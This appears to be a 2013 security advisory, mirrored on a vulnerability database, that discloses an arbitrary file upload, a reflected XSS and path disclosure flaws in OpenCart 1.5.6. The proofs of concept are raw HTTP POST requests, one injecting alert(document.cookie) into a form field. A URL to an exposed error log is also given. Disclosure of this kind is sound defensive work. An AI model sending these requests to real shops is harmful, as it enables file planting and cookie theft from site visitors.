Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30116
HistoryDec 09, 2013 - 12:00 a.m.

Opencart Multiple Vulnerabilities

2013-12-0900:00:00
vulners.com
344
JSON

###########################################################################

Title: Opencart Multiple Vulnerabilities

Vendor: http://www.opencart.com

Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure

Vulnerable Version: opencart 1.5.6 (prior versions also may be affected)

Exploitation: Remote with browser

Impact: High

Vendor Supplied Patch: N/A

Original Advisory with Workaround:

http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html

###########################################################################

####################

  • Description:
    ####################

Quote from vendor: OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and you're ready to start accepting orders.

####################

  • Vulnerability:
    ####################
    In the process of optimizing our crawler engine by garda.ir (garda.ir is a Persian online shopping price comparison service which uses new search engine technologies to grab prices) we found file upload vulnerability in opencart application, further investigation lead us to discover other vulnerabilities such as path disclosure and xss.

####################

  • POC:
    ####################

1

File Upload

Insufficient Authorization in /catalog/controller/product/product.php

Result: testupload.txt.somehash is created in /download folder

POST /opencart-1.5.6/index.php?route=product/product/upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 206
Connection: Keep-Alive

-----------------------------4827543632391
Content-Disposition: form-data; name="file"; filename="testupload.txt"
Content-Type: text/plain

testtesttest
-----------------------------4827543632391–

2

Reflected XSS and Path Disclosure

Input Validation Error in /catalog/controller/account/register.php

Result: this will cause arbitrary scripting code to be executed by the # target user's browser.

POST /opencart-1.5.6/index.php?route=account/register HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------1e7a98bc645efbe7
Content-Length: 181
Host: example.com
Connection: Keep-Alive

-----------------------------1e7a98bc645efbe7
Content-Disposition: form-data; name="zone_id"

12345'+alert(document.cookie)+'
-----------------------------1e7a98bc645efbe7–

3

Information Leakage – Path Disclosure

Insufficient Authorization in /system/logs/error.txt

Result: Information Disclosure

http://www.example.com/opencart-1.5.6/system/logs/error.txt

####################

  • Solution:
    ####################
    There is no Vendor Supplied Patch at the time of this entry.
    For workaround check the Original Advisory.

####################

  • Credit:
    ####################
    Discovered by: trueend5 (trueend5 [at] yahoo com)

This advisory is sponsored by garda.ir
http://www.garda.ir
A Persian online shopping price comparison service

JSON